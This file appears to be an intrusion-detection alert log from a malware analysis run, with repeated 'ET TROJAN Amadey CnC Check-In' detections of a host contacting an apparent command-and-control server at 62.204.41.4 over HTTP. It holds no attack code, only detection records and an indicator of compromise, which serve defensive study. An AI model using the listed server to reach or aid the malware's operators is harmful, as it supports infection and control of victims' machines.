192.168.2.562.204.41.450167802027700 02/07/23-19:59:13.182938	TCP	2027700	ET TROJAN Amadey CnC Check-In	50167	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450072802027700 02/07/23-19:58:47.386919	TCP	2027700	ET TROJAN Amadey CnC Check-In	50072	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450049802027700 02/07/23-19:58:39.386685	TCP	2027700	ET TROJAN Amadey CnC Check-In	50049	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450008802027700 02/07/23-19:58:29.531823	TCP	2027700	ET TROJAN Amadey CnC Check-In	50008	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450204802027700 02/07/23-19:59:22.348680	TCP	2027700	ET TROJAN Amadey CnC Check-In	50204	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450400802027700 02/07/23-20:00:16.471395	TCP	2027700	ET TROJAN Amadey CnC Check-In	50400	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449744802027700 02/07/23-19:57:16.664080	TCP	2027700	ET TROJAN Amadey CnC Check-In	49744	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449940802027700 02/07/23-19:58:10.825829	TCP	2027700	ET TROJAN Amadey CnC Check-In	49940	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449998802027700 02/07/23-19:58:27.044687	TCP	2027700	ET TROJAN Amadey CnC Check-In	49998	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449822802027700 02/07/23-19:57:36.840230	TCP	2027700	ET TROJAN Amadey CnC Check-In	49822	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450150802027700 02/07/23-19:59:09.040992	TCP	2027700	ET TROJAN Amadey CnC Check-In	50150	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450363802027700 02/07/23-20:00:07.542076	TCP	2027700	ET TROJAN Amadey CnC Check-In	50363	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450080802027700 02/07/23-19:58:49.338343	TCP	2027700	ET TROJAN Amadey CnC Check-In	50080	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450405802027700 02/07/23-20:00:17.657437	TCP	2027700	ET TROJAN Amadey CnC Check-In	50405	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450441802027700 02/07/23-20:00:28.375723	TCP	2027700	ET TROJAN Amadey CnC Check-In	50441	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449870802027700 02/07/23-19:57:52.051772	TCP	2027700	ET TROJAN Amadey CnC Check-In	49870	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450044802027700 02/07/23-19:58:38.182720	TCP	2027700	ET TROJAN Amadey CnC Check-In	50044	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449917802027700 02/07/23-19:58:03.280189	TCP	2027700	ET TROJAN Amadey CnC Check-In	49917	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450245802027700 02/07/23-19:59:34.591841	TCP	2027700	ET TROJAN Amadey CnC Check-In	50245	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449875802027700 02/07/23-19:57:53.010907	TCP	2027700	ET TROJAN Amadey CnC Check-In	49875	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450298802027700 02/07/23-19:59:49.514228	TCP	2027700	ET TROJAN Amadey CnC Check-In	50298	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449757802027700 02/07/23-19:57:19.196421	TCP	2027700	ET TROJAN Amadey CnC Check-In	49757	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450024802027700 02/07/23-19:58:33.541536	TCP	2027700	ET TROJAN Amadey CnC Check-In	50024	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450315802027700 02/07/23-19:59:53.640304	TCP	2027700	ET TROJAN Amadey CnC Check-In	50315	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450085802027700 02/07/23-19:58:50.542002	TCP	2027700	ET TROJAN Amadey CnC Check-In	50085	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450413802027700 02/07/23-20:00:19.937795	TCP	2027700	ET TROJAN Amadey CnC Check-In	50413	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449867802027700 02/07/23-19:57:51.323673	TCP	2027700	ET TROJAN Amadey CnC Check-In	49867	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450195802027700 02/07/23-19:59:19.673213	TCP	2027700	ET TROJAN Amadey CnC Check-In	50195	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449711802027700 02/07/23-19:57:09.336516	TCP	2027700	ET TROJAN Amadey CnC Check-In	49711	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449895802027700 02/07/23-19:57:57.922450	TCP	2027700	ET TROJAN Amadey CnC Check-In	49895	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449965802027700 02/07/23-19:58:16.796475	TCP	2027700	ET TROJAN Amadey CnC Check-In	49965	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450293802027700 02/07/23-19:59:48.325220	TCP	2027700	ET TROJAN Amadey CnC Check-In	50293	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450122802027700 02/07/23-19:58:59.516632	TCP	2027700	ET TROJAN Amadey CnC Check-In	50122	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450278802027700 02/07/23-19:59:44.686906	TCP	2027700	ET TROJAN Amadey CnC Check-In	50278	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450376802027700 02/07/23-20:00:10.676242	TCP	2027700	ET TROJAN Amadey CnC Check-In	50376	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450232802027700 02/07/23-19:59:31.467525	TCP	2027700	ET TROJAN Amadey CnC Check-In	50232	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449729802027700 02/07/23-19:57:13.008119	TCP	2027700	ET TROJAN Amadey CnC Check-In	49729	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449981802027700 02/07/23-19:58:20.676823	TCP	2027700	ET TROJAN Amadey CnC Check-In	49981	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450330802027700 02/07/23-19:59:57.254968	TCP	2027700	ET TROJAN Amadey CnC Check-In	50330	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450229802027700 02/07/23-19:59:30.761202	TCP	2027700	ET TROJAN Amadey CnC Check-In	50229	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450057802027700 02/07/23-19:58:41.341646	TCP	2027700	ET TROJAN Amadey CnC Check-In	50057	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449904802027700 02/07/23-19:58:00.083813	TCP	2027700	ET TROJAN Amadey CnC Check-In	49904	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449732802027700 02/07/23-19:57:13.710639	TCP	2027700	ET TROJAN Amadey CnC Check-In	49732	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449830802027700 02/07/23-19:57:38.830731	TCP	2027700	ET TROJAN Amadey CnC Check-In	49830	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449986802027700 02/07/23-19:58:21.857184	TCP	2027700	ET TROJAN Amadey CnC Check-In	49986	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450265802027700 02/07/23-19:59:39.451988	TCP	2027700	ET TROJAN Amadey CnC Check-In	50265	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449937802027700 02/07/23-19:58:10.104815	TCP	2027700	ET TROJAN Amadey CnC Check-In	49937	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449862802027700 02/07/23-19:57:50.104682	TCP	2027700	ET TROJAN Amadey CnC Check-In	49862	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450302802027700 02/07/23-19:59:50.470972	TCP	2027700	ET TROJAN Amadey CnC Check-In	50302	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450060802027700 02/07/23-19:58:42.295231	TCP	2027700	ET TROJAN Amadey CnC Check-In	50060	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450190802027700 02/07/23-19:59:18.716317	TCP	2027700	ET TROJAN Amadey CnC Check-In	50190	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449978802027700 02/07/23-19:58:19.951026	TCP	2027700	ET TROJAN Amadey CnC Check-In	49978	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449724802027700 02/07/23-19:57:11.745483	TCP	2027700	ET TROJAN Amadey CnC Check-In	49724	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450011802027700 02/07/23-19:58:30.290364	TCP	2027700	ET TROJAN Amadey CnC Check-In	50011	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450224802027700 02/07/23-19:59:29.577696	TCP	2027700	ET TROJAN Amadey CnC Check-In	50224	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450052802027700 02/07/23-19:58:40.105001	TCP	2027700	ET TROJAN Amadey CnC Check-In	50052	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450348802027700 02/07/23-20:00:03.954544	TCP	2027700	ET TROJAN Amadey CnC Check-In	50348	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450159802027700 02/07/23-19:59:11.230109	TCP	2027700	ET TROJAN Amadey CnC Check-In	50159	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450384802027700 02/07/23-20:00:12.627471	TCP	2027700	ET TROJAN Amadey CnC Check-In	50384	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449765802027700 02/07/23-19:57:20.854177	TCP	2027700	ET TROJAN Amadey CnC Check-In	49765	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450029802027700 02/07/23-19:58:34.809953	TCP	2027700	ET TROJAN Amadey CnC Check-In	50029	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450130802027700 02/07/23-19:59:01.720565	TCP	2027700	ET TROJAN Amadey CnC Check-In	50130	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450343802027700 02/07/23-20:00:00.779938	TCP	2027700	ET TROJAN Amadey CnC Check-In	50343	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450421802027700 02/07/23-20:00:23.597298	TCP	2027700	ET TROJAN Amadey CnC Check-In	50421	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450260802027700 02/07/23-19:59:38.219727	TCP	2027700	ET TROJAN Amadey CnC Check-In	50260	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449932802027700 02/07/23-19:58:09.150327	TCP	2027700	ET TROJAN Amadey CnC Check-In	49932	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449890802027700 02/07/23-19:57:56.718243	TCP	2027700	ET TROJAN Amadey CnC Check-In	49890	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449802802027700 02/07/23-19:57:32.212401	TCP	2027700	ET TROJAN Amadey CnC Check-In	49802	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449760802027700 02/07/23-19:57:19.749026	TCP	2027700	ET TROJAN Amadey CnC Check-In	49760	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449973802027700 02/07/23-19:58:18.734052	TCP	2027700	ET TROJAN Amadey CnC Check-In	49973	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449728802027700 02/07/23-19:57:12.773087	TCP	2027700	ET TROJAN Amadey CnC Check-In	49728	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449985802027700 02/07/23-19:58:21.623964	TCP	2027700	ET TROJAN Amadey CnC Check-In	49985	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449731802027700 02/07/23-19:57:13.477085	TCP	2027700	ET TROJAN Amadey CnC Check-In	49731	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449798802027700 02/07/23-19:57:31.270025	TCP	2027700	ET TROJAN Amadey CnC Check-In	49798	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449887802027700 02/07/23-19:57:55.996115	TCP	2027700	ET TROJAN Amadey CnC Check-In	49887	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450249802027700 02/07/23-19:59:35.548839	TCP	2027700	ET TROJAN Amadey CnC Check-In	50249	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450347802027700 02/07/23-20:00:03.721907	TCP	2027700	ET TROJAN Amadey CnC Check-In	50347	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450445802027700 02/07/23-20:00:29.348634	TCP	2027700	ET TROJAN Amadey CnC Check-In	50445	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449896802027700 02/07/23-19:57:58.170170	TCP	2027700	ET TROJAN Amadey CnC Check-In	49896	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450350802027700 02/07/23-20:00:04.422898	TCP	2027700	ET TROJAN Amadey CnC Check-In	50350	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449737802027700 02/07/23-19:57:14.935623	TCP	2027700	ET TROJAN Amadey CnC Check-In	49737	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450252802027700 02/07/23-19:59:36.278597	TCP	2027700	ET TROJAN Amadey CnC Check-In	50252	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449826802027700 02/07/23-19:57:37.847264	TCP	2027700	ET TROJAN Amadey CnC Check-In	49826	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450163802027700 02/07/23-19:59:12.188385	TCP	2027700	ET TROJAN Amadey CnC Check-In	50163	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450191802027700 02/07/23-19:59:18.961060	TCP	2027700	ET TROJAN Amadey CnC Check-In	50191	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450261802027700 02/07/23-19:59:38.469324	TCP	2027700	ET TROJAN Amadey CnC Check-In	50261	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450093802027700 02/07/23-19:58:52.513268	TCP	2027700	ET TROJAN Amadey CnC Check-In	50093	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450280802027700 02/07/23-19:59:45.156579	TCP	2027700	ET TROJAN Amadey CnC Check-In	50280	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449859802027700 02/07/23-19:57:49.355361	TCP	2027700	ET TROJAN Amadey CnC Check-In	49859	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450356802027700 02/07/23-20:00:05.846184	TCP	2027700	ET TROJAN Amadey CnC Check-In	50356	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450004802027700 02/07/23-19:58:28.516743	TCP	2027700	ET TROJAN Amadey CnC Check-In	50004	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450102802027700 02/07/23-19:58:54.714299	TCP	2027700	ET TROJAN Amadey CnC Check-In	50102	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450258802027700 02/07/23-19:59:37.739913	TCP	2027700	ET TROJAN Amadey CnC Check-In	50258	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450089802027700 02/07/23-19:58:51.531272	TCP	2027700	ET TROJAN Amadey CnC Check-In	50089	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449960802027700 02/07/23-19:58:15.604284	TCP	2027700	ET TROJAN Amadey CnC Check-In	49960	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449868802027700 02/07/23-19:57:51.563260	TCP	2027700	ET TROJAN Amadey CnC Check-In	49868	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450328802027700 02/07/23-19:59:56.770342	TCP	2027700	ET TROJAN Amadey CnC Check-In	50328	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449709802027700 02/07/23-19:57:08.852068	TCP	2027700	ET TROJAN Amadey CnC Check-In	49709	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449703802027700 02/07/23-19:57:06.000700	TCP	2027700	ET TROJAN Amadey CnC Check-In	49703	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449810802027700 02/07/23-19:57:34.139598	TCP	2027700	ET TROJAN Amadey CnC Check-In	49810	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449957802027700 02/07/23-19:58:14.905022	TCP	2027700	ET TROJAN Amadey CnC Check-In	49957	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450417802027700 02/07/23-20:00:22.516624	TCP	2027700	ET TROJAN Amadey CnC Check-In	50417	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450092802027700 02/07/23-19:58:52.278298	TCP	2027700	ET TROJAN Amadey CnC Check-In	50092	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450179802027700 02/07/23-19:59:16.043396	TCP	2027700	ET TROJAN Amadey CnC Check-In	50179	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449827802027700 02/07/23-19:57:38.087800	TCP	2027700	ET TROJAN Amadey CnC Check-In	49827	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450322802027700 02/07/23-19:59:55.303213	TCP	2027700	ET TROJAN Amadey CnC Check-In	50322	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450233802027700 02/07/23-19:59:31.718708	TCP	2027700	ET TROJAN Amadey CnC Check-In	50233	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450418802027700 02/07/23-20:00:22.859106	TCP	2027700	ET TROJAN Amadey CnC Check-In	50418	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450446802027700 02/07/23-20:00:29.582178	TCP	2027700	ET TROJAN Amadey CnC Check-In	50446	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449929802027700 02/07/23-19:58:08.454291	TCP	2027700	ET TROJAN Amadey CnC Check-In	49929	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450286802027700 02/07/23-19:59:46.657209	TCP	2027700	ET TROJAN Amadey CnC Check-In	50286	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449797802027700 02/07/23-19:57:31.010574	TCP	2027700	ET TROJAN Amadey CnC Check-In	49797	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450032802027700 02/07/23-19:58:35.551488	TCP	2027700	ET TROJAN Amadey CnC Check-In	50032	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449740802027700 02/07/23-19:57:15.662783	TCP	2027700	ET TROJAN Amadey CnC Check-In	49740	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449994802027700 02/07/23-19:58:24.905756	TCP	2027700	ET TROJAN Amadey CnC Check-In	49994	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450121802027700 02/07/23-19:58:59.277722	TCP	2027700	ET TROJAN Amadey CnC Check-In	50121	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450162802027700 02/07/23-19:59:11.945539	TCP	2027700	ET TROJAN Amadey CnC Check-In	50162	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450375802027700 02/07/23-20:00:10.441776	TCP	2027700	ET TROJAN Amadey CnC Check-In	50375	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450073802027700 02/07/23-19:58:47.629161	TCP	2027700	ET TROJAN Amadey CnC Check-In	50073	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449900802027700 02/07/23-19:57:59.126282	TCP	2027700	ET TROJAN Amadey CnC Check-In	49900	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449941802027700 02/07/23-19:58:11.058629	TCP	2027700	ET TROJAN Amadey CnC Check-In	49941	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450217802027700 02/07/23-19:59:27.889673	TCP	2027700	ET TROJAN Amadey CnC Check-In	50217	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449953802027700 02/07/23-19:58:13.951278	TCP	2027700	ET TROJAN Amadey CnC Check-In	49953	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449944802027700 02/07/23-19:58:11.828444	TCP	2027700	ET TROJAN Amadey CnC Check-In	49944	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450119802027700 02/07/23-19:58:58.794403	TCP	2027700	ET TROJAN Amadey CnC Check-In	50119	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449855802027700 02/07/23-19:57:48.404554	TCP	2027700	ET TROJAN Amadey CnC Check-In	49855	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450306802027700 02/07/23-19:59:51.473442	TCP	2027700	ET TROJAN Amadey CnC Check-In	50306	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450036802027700 02/07/23-19:58:36.277046	TCP	2027700	ET TROJAN Amadey CnC Check-In	50036	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450208802027700 02/07/23-19:59:25.676246	TCP	2027700	ET TROJAN Amadey CnC Check-In	50208	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449769802027700 02/07/23-19:57:21.585123	TCP	2027700	ET TROJAN Amadey CnC Check-In	49769	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449938802027700 02/07/23-19:58:10.348630	TCP	2027700	ET TROJAN Amadey CnC Check-In	49938	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450220802027700 02/07/23-19:59:28.638484	TCP	2027700	ET TROJAN Amadey CnC Check-In	50220	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450401802027700 02/07/23-20:00:16.704967	TCP	2027700	ET TROJAN Amadey CnC Check-In	50401	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450391802027700 02/07/23-20:00:14.311492	TCP	2027700	ET TROJAN Amadey CnC Check-In	50391	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450303802027700 02/07/23-19:59:50.704498	TCP	2027700	ET TROJAN Amadey CnC Check-In	50303	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450045802027700 02/07/23-19:58:38.414558	TCP	2027700	ET TROJAN Amadey CnC Check-In	50045	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449883802027700 02/07/23-19:57:54.965082	TCP	2027700	ET TROJAN Amadey CnC Check-In	49883	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450051802027700 02/07/23-19:58:39.861264	TCP	2027700	ET TROJAN Amadey CnC Check-In	50051	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450299802027700 02/07/23-19:59:49.758751	TCP	2027700	ET TROJAN Amadey CnC Check-In	50299	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449916802027700 02/07/23-19:58:03.032699	TCP	2027700	ET TROJAN Amadey CnC Check-In	49916	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450134802027700 02/07/23-19:59:04.959509	TCP	2027700	ET TROJAN Amadey CnC Check-In	50134	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449785802027700 02/07/23-19:57:28.117998	TCP	2027700	ET TROJAN Amadey CnC Check-In	49785	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450388802027700 02/07/23-20:00:13.583065	TCP	2027700	ET TROJAN Amadey CnC Check-In	50388	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449972802027700 02/07/23-19:58:18.490991	TCP	2027700	ET TROJAN Amadey CnC Check-In	49972	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450106802027700 02/07/23-19:58:55.697715	TCP	2027700	ET TROJAN Amadey CnC Check-In	50106	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449966802027700 02/07/23-19:58:17.026384	TCP	2027700	ET TROJAN Amadey CnC Check-In	49966	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450420802027700 02/07/23-20:00:23.363085	TCP	2027700	ET TROJAN Amadey CnC Check-In	50420	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450017802027700 02/07/23-19:58:31.793987	TCP	2027700	ET TROJAN Amadey CnC Check-In	50017	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449712802027700 02/07/23-19:57:09.572156	TCP	2027700	ET TROJAN Amadey CnC Check-In	49712	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449801802027700 02/07/23-19:57:31.978610	TCP	2027700	ET TROJAN Amadey CnC Check-In	49801	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449925802027700 02/07/23-19:58:07.476078	TCP	2027700	ET TROJAN Amadey CnC Check-In	49925	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450236802027700 02/07/23-19:59:32.439969	TCP	2027700	ET TROJAN Amadey CnC Check-In	50236	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449842802027700 02/07/23-19:57:41.717333	TCP	2027700	ET TROJAN Amadey CnC Check-In	49842	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449753802027700 02/07/23-19:57:18.413042	TCP	2027700	ET TROJAN Amadey CnC Check-In	49753	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450331802027700 02/07/23-19:59:57.512462	TCP	2027700	ET TROJAN Amadey CnC Check-In	50331	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449699802027700 02/07/23-19:57:03.880243	TCP	2027700	ET TROJAN Amadey CnC Check-In	49699	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450372802027700 02/07/23-20:00:09.704797	TCP	2027700	ET TROJAN Amadey CnC Check-In	50372	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450461802027700 02/07/23-20:00:32.989437	TCP	2027700	ET TROJAN Amadey CnC Check-In	50461	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449772802027700 02/07/23-19:57:22.305855	TCP	2027700	ET TROJAN Amadey CnC Check-In	49772	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450188802027700 02/07/23-19:59:18.207900	TCP	2027700	ET TROJAN Amadey CnC Check-In	50188	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450023802027700 02/07/23-19:58:33.280642	TCP	2027700	ET TROJAN Amadey CnC Check-In	50023	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450064802027700 02/07/23-19:58:44.287580	TCP	2027700	ET TROJAN Amadey CnC Check-In	50064	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450277802027700 02/07/23-19:59:44.403140	TCP	2027700	ET TROJAN Amadey CnC Check-In	50277	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450319802027700 02/07/23-19:59:54.594853	TCP	2027700	ET TROJAN Amadey CnC Check-In	50319	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450147802027700 02/07/23-19:59:08.302721	TCP	2027700	ET TROJAN Amadey CnC Check-In	50147	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450151802027700 02/07/23-19:59:09.287465	TCP	2027700	ET TROJAN Amadey CnC Check-In	50151	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449979802027700 02/07/23-19:58:20.181959	TCP	2027700	ET TROJAN Amadey CnC Check-In	49979	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450439802027700 02/07/23-20:00:27.911911	TCP	2027700	ET TROJAN Amadey CnC Check-In	50439	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449921802027700 02/07/23-19:58:04.595004	TCP	2027700	ET TROJAN Amadey CnC Check-In	49921	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450390802027700 02/07/23-20:00:14.048984	TCP	2027700	ET TROJAN Amadey CnC Check-In	50390	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450068802027700 02/07/23-19:58:46.433814	TCP	2027700	ET TROJAN Amadey CnC Check-In	50068	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450424802027700 02/07/23-20:00:24.325922	TCP	2027700	ET TROJAN Amadey CnC Check-In	50424	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450246802027700 02/07/23-19:59:34.827639	TCP	2027700	ET TROJAN Amadey CnC Check-In	50246	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449743802027700 02/07/23-19:57:16.382887	TCP	2027700	ET TROJAN Amadey CnC Check-In	49743	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449771802027700 02/07/23-19:57:22.069473	TCP	2027700	ET TROJAN Amadey CnC Check-In	49771	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449899802027700 02/07/23-19:57:58.885147	TCP	2027700	ET TROJAN Amadey CnC Check-In	49899	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450301802027700 02/07/23-19:59:50.234623	TCP	2027700	ET TROJAN Amadey CnC Check-In	50301	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450279802027700 02/07/23-19:59:44.920542	TCP	2027700	ET TROJAN Amadey CnC Check-In	50279	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450010802027700 02/07/23-19:58:30.047946	TCP	2027700	ET TROJAN Amadey CnC Check-In	50010	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450362802027700 02/07/23-20:00:07.266629	TCP	2027700	ET TROJAN Amadey CnC Check-In	50362	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450123802027700 02/07/23-19:58:59.760627	TCP	2027700	ET TROJAN Amadey CnC Check-In	50123	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449838802027700 02/07/23-19:57:40.748973	TCP	2027700	ET TROJAN Amadey CnC Check-In	49838	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450184802027700 02/07/23-19:59:17.230713	TCP	2027700	ET TROJAN Amadey CnC Check-In	50184	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450380802027700 02/07/23-20:00:11.655903	TCP	2027700	ET TROJAN Amadey CnC Check-In	50380	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450457802027700 02/07/23-20:00:31.981578	TCP	2027700	ET TROJAN Amadey CnC Check-In	50457	80	192.168.2.5	62.204.41.4
